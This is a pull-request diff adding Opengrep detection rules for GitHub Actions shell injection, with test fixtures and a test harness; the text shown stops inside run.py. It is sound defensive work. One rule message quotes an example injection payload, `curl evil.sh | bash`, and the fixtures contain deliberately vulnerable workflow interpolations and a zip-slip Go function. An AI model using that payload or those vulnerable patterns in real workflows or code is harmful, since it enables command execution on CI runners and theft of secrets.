### PR TITLE
Add GitHub Actions shell-injection Opengrep rules + rule test harness

### DIFF
--- a/.github/workflows/test-opengrep-rules.yml
+++ b/.github/workflows/test-opengrep-rules.yml
@@ -1,0 +1,45 @@
+name: Opengrep rule tests
+
+# Regression tests for the custom Opengrep rules in sast/opengrep/rules.
+# Each rule is run with `opengrep --test` against its annotated fixture in
+# sast/opengrep/tests. See sast/opengrep/tests/README.md.
+
+on:
+  pull_request:
+    paths:
+      - 'sast/opengrep/rules/**'
+      - 'sast/opengrep/tests/**'
+      - '.github/workflows/test-opengrep-rules.yml'
+  merge_group:
+
+permissions:
+  contents: read
+
+jobs:
+  rule-tests:
+    name: opengrep/rule-tests
+    runs-on: ubuntu-latest
+    steps:
+      - uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6.0.2
+
+      - name: Install opengrep
+        shell: bash
+        env:
+          VERSION: v1.21.0
+          # SHA-256 of opengrep_manylinux_x86 for VERSION. Pins the bytes so a
+          # swapped/re-uploaded release asset fails the job. Bump together with
+          # VERSION (recompute: curl -fsSL <asset-url> | sha256sum).
+          OPENGREP_SHA256: 9ed0ceee4a3a406d27d40894bcce85ea151be21e6d4b180689689224faff2a3e
+        run: |
+          set -euo pipefail
+          dir="${RUNNER_TEMP}/opengrep"
+          mkdir -p "$dir"
+          curl -fsSL \
+            "https://github.com/opengrep/opengrep/releases/download/${VERSION}/opengrep_manylinux_x86" \
+            -o "$dir/opengrep"
+          echo "${OPENGREP_SHA256}  ${dir}/opengrep" | sha256sum -c -
+          chmod +x "$dir/opengrep"
+          echo "$dir" >> "$GITHUB_PATH"
+
+      - name: Run rule regression tests
+        run: python3 sast/opengrep/tests/run.py

--- a/.semgrepignore
+++ b/.semgrepignore
@@ -1,0 +1,9 @@
+# Rule regression-test fixtures contain intentional vulnerabilities so the
+# Opengrep rules can be tested against them. Exclude them from real scans
+# (this repo's own Opengrep/Semgrep self-scans) so they don't report findings.
+# `opengrep --test` targets these files explicitly and is unaffected by this.
+#
+# NOTE: the filename must be `.semgrepignore`. Opengrep has no `.opengrepignore`
+# — it honors `.semgrepignore` (inherited from semgrep); a `.opengrepignore`
+# file is silently ignored (verified against opengrep v1.21.0). Do not rename.
+sast/opengrep/tests/

--- a/sast/opengrep/README.md
+++ b/sast/opengrep/README.md
@@ -72,7 +72,10 @@ When a finding's line isn't part of the diff (edge case), the action falls back 
 
 | Rule | Languages | What it detects |
 |---|---|---|
-| `security.gha.missing-explicit-permissions-temporal` | yaml | GitHub Actions workflows without explicit `permissions:` |
+| `security.gha.missing-explicit-permissions` | yaml | GitHub Actions workflows without explicit `permissions:` |
+| `security.gha.run-shell-injection` | yaml | Untrusted `${{ github.* }}` context interpolated into a `run:`/`script:` block (shell injection) |
+| `security.gha.run-shell-injection-inputs` | yaml | _(WARNING)_ Caller-supplied `inputs.*` interpolated into a `run:`/`script:` block — route through `env:` (advisory) |
+| `security.gha.run-shell-injection-refs` | yaml | _(WARNING)_ Non-fork-controlled Git ref (`github.ref`/`base_ref`/`ref_name`/`pull_request.base.ref`) in a `run:`/`script:` block — route through `env:` (advisory) |
 | `security.gha.deprecated.tibdex-github-app-token` | yaml | Deprecated `tibdex/github-app-token` usage |
 | `security.go-zipslip-archive-path-traversal` | go | Unvalidated archive extraction paths (zip slip) |
 

--- a/sast/opengrep/rules/gha-permissions.yml
+++ b/sast/opengrep/rules/gha-permissions.yml
@@ -1,5 +1,5 @@
 rules:
-  - id: security.gha.missing-explicit-permissions-temporal
+  - id: security.gha.missing-explicit-permissions
     languages:
       - yaml
     severity: ERROR

--- a/sast/opengrep/rules/gha-run-injection-inputs.yml
+++ b/sast/opengrep/rules/gha-run-injection-inputs.yml
@@ -1,0 +1,52 @@
+rules:
+  - id: security.gha.run-shell-injection-inputs
+    languages:
+      - yaml
+    severity: WARNING
+    message: >
+      A composite-action / reusable-workflow / `workflow_dispatch` `inputs.*`
+      value is interpolated directly into this `run`/`script` block. Inputs are
+      supplied by the caller, who may pass attacker-controlled data into them —
+      e.g. a caller invoking this with `version: ${{ github.event.pull_request.head.ref }}`
+      (a fork branch name). Because the input value is substituted before the
+      shell runs, the callee cannot trust it. Defensive fix: copy the input into
+      a step-level `env:` entry (e.g. `VERSION: ${{ inputs.version }}`) and
+      reference the quoted environment variable in the script instead
+      (`echo "$VERSION"`). This is advisory (WARNING): not every input carries
+      untrusted data, but routing inputs through `env:` makes the component safe
+      regardless of how callers use it. If an input appears only as a *condition*
+      selecting between hard-coded string literals (e.g.
+      `${{ inputs.flag && 'a' || 'b' }}`), the emitted value is constant and that
+      specific use is not exploitable — but hoist the condition into bash (set a
+      boolean `env:` var and branch with `if`) so the `run` line carries no
+      `${{ }}` and the safety stays local and stable. Directly-untrusted
+      `github.*` contexts are covered separately by
+      `security.gha.run-shell-injection`.
+    paths:
+      include:
+        - .github/workflows/**
+        - "**/action.yml"
+        - "**/action.yaml"
+    patterns:
+      - pattern-either:
+          - pattern: "run: $CMD"
+          - pattern: "script: $CMD"
+      - metavariable-regex:
+          metavariable: $CMD
+          # `inputs.<name>` not preceded by a dot — excludes `github.event.inputs.*`
+          # (the directly-untrusted case handled by the ERROR rule) to avoid double-reporting.
+          # Matches dot and bracket access: `inputs.x`, `inputs['x']`, `inputs["x"]`.
+          regex: (?si).*[^.\w]inputs(?:\.[\w-]+|\[['"][\w-]+['"]\])
+    metadata:
+      source: sast/opengrep/rules/gha-run-injection-inputs.yml
+      category: security
+      cwe:
+        - "CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')"
+      owasp:
+        - A03:2021 - Injection
+      technology:
+        - github-actions
+      confidence: LOW
+      references:
+        - https://docs.github.com/en/actions/concepts/security/script-injections
+        - https://securitylab.github.com/resources/github-actions-untrusted-input/

--- a/sast/opengrep/rules/gha-run-injection-refs.yml
+++ b/sast/opengrep/rules/gha-run-injection-refs.yml
@@ -1,0 +1,44 @@
+rules:
+  - id: security.gha.run-shell-injection-refs
+    languages:
+      - yaml
+    severity: WARNING
+    message: >
+      A Git ref (branch/tag name) that is not fork-controlled is interpolated
+      directly into this `run`/`script` block — `github.ref`, `github.base_ref`,
+      `github.ref_name`, `pull_request.base.ref`, or a repository
+      `default_branch`. Setting these requires write access to the repository,
+      so a fork pull request cannot control them and this is not externally
+      exploitable. But Git ref names may contain shell
+      metacharacters (`$`, `;`, backticks, `|`, `(`, `)`), so route the value
+      through a step-level `env:` entry (e.g. `REF: ${{ github.base_ref }}`) and
+      reference the quoted environment variable instead (`echo "$REF"`) as
+      defense-in-depth. The fork-controlled refs (`github.head_ref`,
+      `pull_request.head.ref`) are the externally-exploitable case and are
+      reported at ERROR severity by `security.gha.run-shell-injection`.
+    paths:
+      include:
+        - .github/workflows/**
+        - "**/action.yml"
+        - "**/action.yaml"
+    patterns:
+      - pattern-either:
+          - pattern: "run: $CMD"
+          - pattern: "script: $CMD"
+      - metavariable-regex:
+          metavariable: $CMD
+          # Matches both dot and bracket property access: `.x`, `['x']`, `["x"]`.
+          regex: (?si).*\bgithub(?:\.ref\b|\[['"]ref['"]\]|\.ref_name\b|\[['"]ref_name['"]\]|\.base_ref\b|\[['"]base_ref['"]\]|(?:\.event\b|\[['"]event['"]\])[\w.\[\]'"*-]*\.base\.ref\b|(?:\.event\b|\[['"]event['"]\])[\w.\[\]'"*-]*[.'"]default_branch\b)
+    metadata:
+      source: sast/opengrep/rules/gha-run-injection-refs.yml
+      category: security
+      cwe:
+        - "CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')"
+      owasp:
+        - A03:2021 - Injection
+      technology:
+        - github-actions
+      confidence: LOW
+      references:
+        - https://docs.github.com/en/actions/concepts/security/script-injections
+        - https://securitylab.github.com/resources/github-actions-untrusted-input/

--- a/sast/opengrep/rules/gha-run-injection.yml
+++ b/sast/opengrep/rules/gha-run-injection.yml
@@ -1,0 +1,63 @@
+rules:
+  - id: security.gha.run-shell-injection
+    languages:
+      - yaml
+    severity: ERROR
+    message: >
+      Untrusted GitHub context is interpolated directly into this `run`/`script`
+      block, where it is substituted into the command *before* the shell runs —
+      so quoting inside the script does not protect you. An attacker who controls
+      the value (e.g. a pull-request title, label, or fork branch name such as
+      `a"; curl evil.sh | bash; "`) can execute arbitrary commands on the runner
+      and steal secrets or code. Fix: copy the value into a step-level `env:`
+      entry (e.g. `TITLE: ${{ github.event.pull_request.title }}`) and reference
+      the quoted environment variable in the script instead (`echo "$TITLE"`),
+      which keeps the untrusted data out of command parsing. If the value appears
+      only as a *condition* choosing between hard-coded string literals (e.g.
+      `${{ github.head_ref == 'x' && 'a' || 'b' }}`) the result is constant and
+      not exploitable; still hoist it into bash so the `run` line carries no
+      `${{ }}`. Only inputs an external contributor can control without write
+      access are flagged.
+    paths:
+      include:
+        - .github/workflows/**
+        - "**/action.yml"
+        - "**/action.yaml"
+    patterns:
+      - pattern-either:
+          - pattern: "run: $CMD"
+          - pattern: "script: $CMD"
+      - metavariable-regex:
+          metavariable: $CMD
+          # Flags only externally (fork-PR) controllable, shell-injectable context.
+          # Intentionally NOT flagged here, by design:
+          #   - `github.workflow`: repo-defined, not attacker-controlled.
+          #   - charset-constrained identifiers that cannot carry shell metacharacters
+          #     (`*.login`, `github.actor`, `*.sha`, and `.name` on repository /
+          #     repo / organization — those names are [A-Za-z0-9._-] only, so the
+          #     `.name` match below is scoped to free-text owners).
+          #   - non-fork-controlled refs / branch names (`github.ref`, `base_ref`,
+          #     `ref_name`, `pull_request.base.ref`, and `*.default_branch`) —
+          #     write-access-gated, advisory only, see
+          #     `security.gha.run-shell-injection-refs`.
+          #   - caller-supplied `inputs.*` — advisory, see
+          #     `security.gha.run-shell-injection-inputs`.
+          # Matches both dot and bracket property access: `.x`, `['x']`, `["x"]`.
+          # `.name` is scoped to free-text owners (author/committer/pusher/label(s)/
+          # release/project[_column]) so it does NOT match charset-constrained
+          # `repository.name` / `repo.name` / `organization.name`.
+          regex: (?si).*\bgithub(?:\.head_ref\b|\[['"]head_ref['"]\]|(?:\.event\b|\[['"]event['"]\])(?:(?:\.inputs\b|\[['"]inputs['"]\])(?:\.[\w-]+|\[['"][\w-]+['"]\])|\.pull_request\.head\.ref\b|\.deployment\.ref\b|[\w.\[\]'"*-]*[.'"](?:title|body|message|description|note|page_name|email|label|head_branch)\b|[\w.\[\]'"*-]*\b(?:author|committer|pusher|labels?(?:\.\*|\[\d+\])?|release|project_column|project)(?:\.name\b|\[['"]name['"]\])))
+    metadata:
+      source: sast/opengrep/rules/gha-run-injection.yml
+      category: security
+      cwe:
+        - "CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')"
+      owasp:
+        - A03:2021 - Injection
+      technology:
+        - github-actions
+      confidence: HIGH
+      references:
+        - https://docs.github.com/en/actions/concepts/security/script-injections
+        - https://docs.github.com/en/actions/security-for-github-actions/security-guides/security-hardening-for-github-actions
+        - https://securitylab.github.com/resources/github-actions-untrusted-input/

--- a/sast/opengrep/tests/.github/workflows/deprecated-actions.yaml
+++ b/sast/opengrep/tests/.github/workflows/deprecated-actions.yaml
@@ -1,0 +1,12 @@
+# Regression fixture for `security.gha.deprecated.tibdex-github-app-token`.
+on: push
+permissions:
+  contents: read
+jobs:
+  j:
+    runs-on: ubuntu-latest
+    steps:
+      # ruleid: security.gha.deprecated.tibdex-github-app-token
+      - uses: tibdex/github-app-token@v2
+      # ok: security.gha.deprecated.tibdex-github-app-token
+      - uses: actions/create-github-app-token@v2

--- a/sast/opengrep/tests/.github/workflows/gha-permissions.yaml
+++ b/sast/opengrep/tests/.github/workflows/gha-permissions.yaml
@@ -1,0 +1,16 @@
+# Regression fixture for `security.gha.missing-explicit-permissions`.
+# No workflow-level permissions; one job sets them, one does not.
+on: push
+jobs:
+  no-perms:
+    # ruleid: security.gha.missing-explicit-permissions
+    runs-on: ubuntu-latest
+    steps:
+      - run: echo hi
+  with-perms:
+    # ok: security.gha.missing-explicit-permissions
+    runs-on: ubuntu-latest
+    permissions:
+      contents: read
+    steps:
+      - run: echo hi

--- a/sast/opengrep/tests/.github/workflows/gha-run-injection-inputs.yaml
+++ b/sast/opengrep/tests/.github/workflows/gha-run-injection-inputs.yaml
@@ -1,0 +1,56 @@
+# Regression fixture for `security.gha.run-shell-injection-inputs` (WARNING, advisory).
+# Annotation syntax (ruleid / ok) is documented in sast/opengrep/tests/README.md.
+#
+# These cases encode the documented decision on constant-result ternaries:
+# the rule stays STRICT (no per-expression exception), because a sound
+# exclusion is not expressible here and would create false negatives on
+# mixed lines (a safe ternary AND a real injection share one run value).
+on:
+  workflow_call:
+    inputs:
+      version:
+        type: string
+      version-is-repo-ref:
+        type: boolean
+      flag:
+        type: boolean
+jobs:
+  j:
+    runs-on: ubuntu-latest
+    steps:
+      # --- must flag ---
+      # ruleid: security.gha.run-shell-injection-inputs
+      - run: echo ${{ inputs.version }}
+      # bracket property access
+      # ruleid: security.gha.run-shell-injection-inputs
+      - run: echo ${{ inputs['version'] }}
+      # branch is a CONTEXT value (emitted), not a literal -> dangerous
+      # ruleid: security.gha.run-shell-injection-inputs
+      - run: echo "${{ inputs.flag && 'safe' || inputs.version }}"
+      # MIXED: a constant-result ternary AND a real injection on one run value.
+      # This is the false negative a naive exclusion would introduce -> must still flag.
+      # ruleid: security.gha.run-shell-injection-inputs
+      - run: echo "${{ inputs.flag && 'a' || 'b' }} and ${{ inputs.version }}"
+      # function emits a context value -> dangerous
+      # ruleid: security.gha.run-shell-injection-inputs
+      - run: echo "${{ format('{0}', inputs.version) }}"
+      # constant-result ternary (input only as a condition, both branches literal).
+      # Not exploitable, but STILL flagged (advisory) under the keep-strict decision;
+      # remediation is to hoist the branch into bash (see the ok: case below).
+      # ruleid: security.gha.run-shell-injection-inputs
+      - run: go run . run --version "${{ inputs.version-is-repo-ref && '$(realpath ../x)' || '$INPUT_VERSION' }}"
+        env:
+          INPUT_VERSION: ${{ inputs.version }}
+
+      # --- must NOT flag ---
+      # github.event.inputs.* is the ERROR rule's job, not this one
+      # ok: security.gha.run-shell-injection-inputs
+      - run: echo ${{ github.event.inputs.version }}
+      # bulletproof remediation: branch hoisted into bash, zero ${{ }} in run text
+      # ok: security.gha.run-shell-injection-inputs
+      - run: |
+          if [ "$USE_REPO_REF" = "true" ]; then v="$(realpath ../x)"; else v="$INPUT_VERSION"; fi
+          go run . run --version "$v"
+        env:
+          INPUT_VERSION: ${{ inputs.version }}
+          USE_REPO_REF: ${{ inputs.version-is-repo-ref }}

--- a/sast/opengrep/tests/.github/workflows/gha-run-injection-refs.yaml
+++ b/sast/opengrep/tests/.github/workflows/gha-run-injection-refs.yaml
@@ -1,0 +1,39 @@
+# Regression fixture for `security.gha.run-shell-injection-refs` (WARNING, advisory).
+# Annotation syntax (ruleid / ok) is documented in sast/opengrep/tests/README.md.
+#
+# Non-fork-controlled refs (need write access to set) but metacharacter-capable,
+# so flagged as defense-in-depth. Fork-controlled refs (head_ref, head.ref) are
+# the ERROR rule's job and must NOT fire here.
+on: [push, pull_request]
+jobs:
+  j:
+    runs-on: ubuntu-latest
+    steps:
+      # --- must flag (non-fork refs in run/script) ---
+      # ruleid: security.gha.run-shell-injection-refs
+      - run: echo ${{ github.ref }}
+      # ruleid: security.gha.run-shell-injection-refs
+      - run: echo ${{ github.base_ref }}
+      # ruleid: security.gha.run-shell-injection-refs
+      - run: echo ${{ github.ref_name }}
+      # ruleid: security.gha.run-shell-injection-refs
+      - run: git fetch origin "${{ github.event.pull_request.base.ref }}"
+      # bracket property access
+      # ruleid: security.gha.run-shell-injection-refs
+      - run: echo ${{ github['base_ref'] }}
+      # base-repo default branch: a branch name, write-gated -> advisory
+      # ruleid: security.gha.run-shell-injection-refs
+      - run: ct lint --target-branch ${{ github.event.repository.default_branch }}
+
+      # --- must NOT flag ---
+      # fork-controlled refs belong to security.gha.run-shell-injection (ERROR), not here
+      # ok: security.gha.run-shell-injection-refs
+      - run: echo ${{ github.head_ref }}
+      # ok: security.gha.run-shell-injection-refs
+      - run: echo ${{ github.event.pull_request.head.ref }}
+      # ok: security.gha.run-shell-injection-refs
+      - run: echo ${{ github.sha }}
+      # ok: security.gha.run-shell-injection-refs
+      - run: echo "$REF"
+        env:
+          REF: ${{ github.base_ref }}

--- a/sast/opengrep/tests/.github/workflows/gha-run-injection.yaml
+++ b/sast/opengrep/tests/.github/workflows/gha-run-injection.yaml
@@ -1,0 +1,49 @@
+# Regression fixture for `security.gha.run-shell-injection` (ERROR).
+# Annotation syntax (ruleid / ok) is documented in sast/opengrep/tests/README.md.
+# Run via: python3 sast/opengrep/tests/run.py
+on: [issues, pull_request]
+jobs:
+  j:
+    runs-on: ubuntu-latest
+    steps:
+      # --- must flag: attacker-controllable github context in run/script ---
+      # ruleid: security.gha.run-shell-injection
+      - run: echo ${{ github.event.pull_request.title }}
+      # ruleid: security.gha.run-shell-injection
+      - run: echo ${{ github.head_ref }}
+      # commit author name is free-text (git config) -> injectable
+      # ruleid: security.gha.run-shell-injection
+      - run: echo ${{ github.event.head_commit.author.name }}
+      # label names are user-controlled -> injectable (and toJson doesn't sanitize)
+      # ruleid: security.gha.run-shell-injection
+      - run: echo "${{ toJSON(github.event.pull_request.labels.*.name) }}"
+      # ruleid: security.gha.run-shell-injection
+      - run: |
+          set -e
+          echo "${{ github.event.issue.body }}"
+      - uses: actions/github-script@v7
+        with:
+          # ruleid: security.gha.run-shell-injection
+          script: console.log("${{ github.event.comment.body }}")
+
+      # bracket property access is valid GHA syntax and equally injectable
+      # ruleid: security.gha.run-shell-injection
+      - run: echo ${{ github.event.issue['body'] }}
+      # ruleid: security.gha.run-shell-injection
+      - run: echo ${{ github['event']['comment']['body'] }}
+
+      # --- must NOT flag ---
+      # ok: security.gha.run-shell-injection
+      - run: echo ${{ github.sha }}
+      # repository / org names are [A-Za-z0-9._-] only -> not shell-injectable
+      # ok: security.gha.run-shell-injection
+      - run: echo ${{ github.event.repository.name }}
+      # base-repo default_branch is write-gated -> advisory (refs rule), not ERROR
+      # ok: security.gha.run-shell-injection
+      - run: ct lint --target-branch ${{ github.event.repository.default_branch }}
+      # ok: security.gha.run-shell-injection
+      - run: echo ${{ github.event.pull_request.base.ref }}
+      # ok: security.gha.run-shell-injection
+      - run: echo "$TITLE"
+        env:
+          TITLE: ${{ github.event.pull_request.title }}

--- a/sast/opengrep/tests/Dockerfile
+++ b/sast/opengrep/tests/Dockerfile
@@ -1,0 +1,81 @@
+# syntax=docker/dockerfile:1
+#
+# Hardened, multi-stage image that reproduces the GitHub Actions rule-test
+# environment locally with zero host install. The opengrep binary is
+# cosign-verified (the same Sigstore provenance check ../action.yml performs) in
+# a throwaway builder stage; the final image is minimal, runs as a non-root
+# user, and contains only the verified binary plus Python (for run.py).
+#
+#   # 1:1 with the GitHub-hosted runner (amd64); emulated on Apple Silicon
+#   docker build --platform linux/amd64 -t opengrep-rules sast/opengrep/tests
+#   docker run  --rm --platform linux/amd64 -v "$PWD:/work" opengrep-rules
+#   docker run  --rm --platform linux/amd64 -v "$PWD:/work" opengrep-rules \
+#       opengrep scan --no-rewrite-rule-ids --config sast/opengrep/rules/ .
+#
+#   # fast native build on Apple Silicon (TARGETARCH picks the arm64 binary)
+#   docker build -t opengrep-rules sast/opengrep/tests
+#   docker run --rm -v "$PWD:/work" opengrep-rules
+
+# Pinned base: python:3.12-slim multi-arch manifest digest.
+FROM python:3.12-slim@sha256:090ba77e2958f6af52a5341f788b50b032dd4ca28377d2893dcf1ecbdfdfe203 AS builder
+
+# Keep OPENGREP_VERSION in sync with ../action.yml and
+# ../../../.github/workflows/test-opengrep-rules.yml.
+ARG OPENGREP_VERSION=v1.21.0
+ARG COSIGN_VERSION=v3.0.6
+# TARGETARCH (amd64 | arm64) is supplied automatically by BuildKit from the
+# build/run --platform, so one Dockerfile serves both architectures.
+ARG TARGETARCH
+
+# Everything below runs in the throwaway `builder` stage — curl, cosign, and the
+# apt layers never reach the final image. `set -e` makes any failed step (e.g.
+# a failed signature check) abort the build.
+RUN set -eux; \
+    # download tooling only; --no-install-recommends + dropping the apt lists
+    # keeps the (discarded) builder layer small.
+    apt-get update; \
+    apt-get install -y --no-install-recommends curl ca-certificates; \
+    rm -rf /var/lib/apt/lists/*; \
+    # map the build arch to the matching release asset / cosign binary.
+    case "$TARGETARCH" in \
+      amd64) asset=opengrep_manylinux_x86;     cosign_arch=amd64 ;; \
+      arm64) asset=opengrep_manylinux_aarch64; cosign_arch=arm64 ;; \
+      *) echo "unsupported TARGETARCH: ${TARGETARCH}" >&2; exit 1 ;; \
+    esac; \
+    # fetch the opengrep binary together with its Sigstore signature + cert,
+    # plus the cosign CLI used to check them.
+    rel="https://github.com/opengrep/opengrep/releases/download/${OPENGREP_VERSION}"; \
+    curl -fsSL "${rel}/${asset}"      -o /tmp/opengrep; \
+    curl -fsSL "${rel}/${asset}.sig"  -o /tmp/opengrep.sig; \
+    curl -fsSL "${rel}/${asset}.cert" -o /tmp/opengrep.cert; \
+    curl -fsSL "https://github.com/sigstore/cosign/releases/download/${COSIGN_VERSION}/cosign-linux-${cosign_arch}" \
+      -o /usr/local/bin/cosign; \
+    chmod +x /usr/local/bin/cosign; \
+    # verify provenance: the binary must be signed by opengrep's GitHub Actions
+    # OIDC identity (same check as ../action.yml). Fails the build if it isn't.
+    cosign verify-blob \
+      --certificate /tmp/opengrep.cert \
+      --signature /tmp/opengrep.sig \
+      --certificate-identity-regexp "https://github.com/opengrep/opengrep/" \
+      --certificate-oidc-issuer "https://token.actions.githubusercontent.com" \
+      /tmp/opengrep; \
+    # smoke-test: also catches an arch mismatch (wrong-arch binary won't exec).
+    chmod 0755 /tmp/opengrep; \
+    /tmp/opengrep --version
+
+# ---- final: minimal runtime, non-root, only the verified binary ----
+FROM python:3.12-slim@sha256:090ba77e2958f6af52a5341f788b50b032dd4ca28377d2893dcf1ecbdfdfe203
+
+COPY --from=builder /tmp/opengrep /usr/local/bin/opengrep
+
+# Run as a non-root, no-login user. The high fixed UID avoids colliding with
+# host UIDs on the bind-mounted workspace.
+RUN useradd --create-home --uid 10001 --shell /usr/sbin/nologin runner
+USER 10001
+WORKDIR /work
+# OPENGREP_TEST_BIN makes run.py prefer opengrep; PYTHONDONTWRITEBYTECODE avoids
+# scattering .pyc files into the mounted repo.
+ENV OPENGREP_TEST_BIN=opengrep \
+    PYTHONDONTWRITEBYTECODE=1
+# The repo is mounted at /work at runtime; override the command to scan instead.
+CMD ["python3", "sast/opengrep/tests/run.py"]

--- a/sast/opengrep/tests/README.md
+++ b/sast/opengrep/tests/README.md
@@ -1,0 +1,85 @@
+# Opengrep rule regression tests
+
+Every rule in [`../rules`](../rules) has a fixture here that pins its behavior:
+which lines it **must** flag and which it **must not**. The
+[`Opengrep rule tests`](../../../.github/workflows/test-opengrep-rules.yml)
+workflow runs them on any PR that touches `sast/opengrep/rules/**` or
+`sast/opengrep/tests/**`, so rule changes can't silently regress.
+
+## Run locally
+
+### In Docker (no host install — mirrors CI)
+
+[`Dockerfile`](Dockerfile) installs the same pinned Opengrep binary the
+workflow uses; the repo is mounted at runtime, so edits to rules/fixtures take
+effect without rebuilding. Run from the repo root:
+
+```bash
+docker build --platform linux/amd64 -t opengrep-rules sast/opengrep/tests
+docker run  --rm --platform linux/amd64 -v "$PWD:/work" opengrep-rules            # rule tests
+docker run  --rm --platform linux/amd64 -v "$PWD:/work" opengrep-rules \
+    opengrep scan --no-rewrite-rule-ids --config sast/opengrep/rules/ .           # full scan
+```
+
+`--platform linux/amd64` matches the GitHub-hosted runner (1:1). On Apple
+Silicon that runs under emulation; for a faster native image, drop the
+`--platform` flags — BuildKit's `TARGETARCH` selects the arm64 binary
+automatically.
+
+### On the host (if opengrep or semgrep is installed)
+
+```bash
+python3 sast/opengrep/tests/run.py            # uses opengrep if installed, else semgrep
+OPENGREP_TEST_BIN=semgrep python3 sast/opengrep/tests/run.py   # force an engine
+```
+
+Exit code is non-zero if any test fails or any rule is missing a fixture.
+
+## How pairing works
+
+A rule file `rules/<stem>.yml` is paired with the fixture under this directory
+whose filename **stem** matches `<stem>` — e.g.:
+
+| Rule | Fixture |
+|---|---|
+| `rules/gha-run-injection.yml` | `tests/.github/workflows/gha-run-injection.yaml` |
+| `rules/go-zipslip.yml` | `tests/go/go-zipslip.go` |
+
+Fixtures live at realistic paths (`.github/workflows/…`, `…/action.yml`, `*.go`)
+so each rule's `paths:` / `languages:` filter applies exactly as in production.
+Every rule **must** have a fixture — the runner fails otherwise.
+
+## Annotation syntax
+
+Inside a fixture, annotate the line *immediately above* the line you expect a
+result on (for a multi-line `run: |` block, that's the `run:` line itself):
+
+```yaml
+# ruleid: <rule-id>    # the next line MUST produce a finding for <rule-id>
+- run: echo ${{ github.event.pull_request.title }}
+
+# ok: <rule-id>        # the next line must NOT produce a finding
+- run: echo ${{ github.sha }}
+```
+
+> Do **not** write the literal tokens `# ruleid:` / `# ok:` in explanatory
+> comments — the engine parses every occurrence as an annotation.
+
+## Add or change a test
+
+- **New case for an existing rule:** add lines to that rule's fixture with a
+  `# ruleid:` or `# ok:` annotation. Re-run `run.py`.
+- **New rule:** add `rules/<stem>.yml`, then add a fixture whose stem is
+  `<stem>` at a path its filters accept (a workflow under
+  `tests/.github/workflows/`, an `action.yml`, a `*.go` file, …).
+- **Remove a case:** delete the annotated lines (or the whole fixture if the
+  rule is removed).
+
+## Notes
+
+- These fixtures contain intentional vulnerabilities. The repo-root
+  [`.semgrepignore`](../../../.semgrepignore) keeps them out of this repo's own
+  Opengrep/Semgrep scans; `--test` targets them explicitly and is unaffected.
+- The `security.gha.run-shell-injection-inputs` fixture also encodes the
+  decision to keep that rule strict on constant-result ternaries (see the
+  comments in that fixture).

--- a/sast/opengrep/tests/go/go-zipslip.go
+++ b/sast/opengrep/tests/go/go-zipslip.go
@@ -1,0 +1,28 @@
+// Regression fixture for security.go-zipslip-archive-path-traversal.
+package fixture
+
+import (
+	"archive/zip"
+	"os"
+	"path/filepath"
+	"strings"
+)
+
+func vulnerable(r *zip.Reader, dst string) {
+	for _, f := range r.File {
+		// ruleid: security.go-zipslip-archive-path-traversal
+		path := filepath.Join(dst, f.Name)
+		_ = os.MkdirAll(filepath.Dir(path), 0o755)
+	}
+}
+
+func guarded(r *zip.Reader, dst string) {
+	for _, f := range r.File {
+		if strings.Contains(f.Name, "..") {
+			continue
+		}
+		// ok: security.go-zipslip-archive-path-traversal
+		path := filepath.Join(dst, f.Name)
+		_ = os.MkdirAll(filepath.Dir(path), 0o755)
+	}
+}

--- a/sast/opengrep/tests/run.py
+++ b/sast/opengrep/tests/run.py
@@ -1,0 +1,179 @@
+#!/usr/bin/env python3
+"""Regression-test runner for the Opengrep rules in ../rules.
+
+Each rule file `rules/<stem>.yml` is paired (by filename stem) with a fixture
+file under this `tests/` tree. The fixture is a real workflow / action / source
+file annotated inline:
+
+    # ruleid: <rule-id>   the NEXT line MUST produce a finding for <rule-id>
+    # ok: <rule-id>       the NEXT line must NOT produce a finding
+
+The runner invokes `<engine> --test` (Opengrep in CI, Semgrep locally — same
+interface) once per rule and aggregates the results. It exits non-zero if any
+test fails OR any rule has no fixture, so every rule must ship with tests.
+
+Usage:
+    python3 sast/opengrep/tests/run.py
+    OPENGREP_TEST_BIN=semgrep python3 sast/opengrep/tests/run.py
+"""
+# `from __future__ import annotations` lets the `X | None` annotations below
+# run on the Python 3.9 that ships with macOS as well as the 3.12 container.
+from __future__ import annotations
+
+import json
+import os
+import shutil
+import subprocess
+import sys
+from dataclasses import dataclass, field
+from pathlib import Path
+
+TESTS_DIR = Path(__file__).resolve().parent
+RULES_DIR = TESTS_DIR.parent / "rules"
+REPO_ROOT = TESTS_DIR.parents[2]
+GHA = os.environ.get("GITHUB_ACTIONS") == "true"
+
+
+@dataclass
+class RuleResult:
+    """Outcome of testing one rule; `passed` is true iff there are no failures."""
+
+    name: str
+    failures: list[str] = field(default_factory=list)
+
+    @property
+    def passed(self) -> bool:
+        return not self.failures
+
+
+def pick_engine() -> str:
+    """Pick the test engine: $OPENGREP_TEST_BIN, else opengrep, else semgrep."""
+    if override := os.environ.get("OPENGREP_TEST_BIN"):
+        return override
+    for candidate in ("opengrep", "semgrep"):
+        if shutil.which(candidate):
+            return candidate
+    sys.exit("error: neither 'opengrep' nor 'semgrep' found on PATH "
+             "(set OPENGREP_TEST_BIN to override)")
+
+
+def rule_files() -> list[Path]:
+    """Return the rule files under rules/, sorted for stable output."""
+    return sorted(p for p in RULES_DIR.iterdir() if p.suffix in {".yml", ".yaml"})
+
+
+def fixture_index() -> dict[str, Path]:
+    """Map each fixture's filename stem to its path (one pass over tests/)."""
+    index: dict[str, Path] = {}
+    for path in sorted(TESTS_DIR.rglob("*")):
+        if path.is_file() and path.name != "run.py" and path.name.lower() != "readme.md":
+            index.setdefault(path.stem, path)  # stems are unique by convention
+    return index
+
+
+def rel(path: Path | str) -> str:
+    """Return *path* relative to the repo root (for display and annotations)."""
+    return os.path.relpath(path, REPO_ROOT)
+
+
+def annotate(level: str, file: str, line: int, message: str) -> None:
+    """Emit a GitHub Actions annotation for *file*:*line* (no-op outside CI)."""
+    # `::level file=...,line=...::msg` is a GitHub Actions workflow command — it
+    # surfaces the message inline on the PR diff and checks UI. See:
+    # https://docs.github.com/actions/reference/workflow-commands-for-github-actions
+    if GHA:
+        print(f"::{level} file={rel(file)},line={line}::{message}")
+
+
+def run_one(engine: str, rule: Path, fixture: Path) -> list[str]:
+    """Run `<engine> --test` for one rule; return failure messages (empty == pass)."""
+    proc = subprocess.run(
+        [engine, "--test", "--json", "--config", str(rule), str(fixture)],
+        capture_output=True, text=True, check=False,
+    )
+    if not proc.stdout.strip():
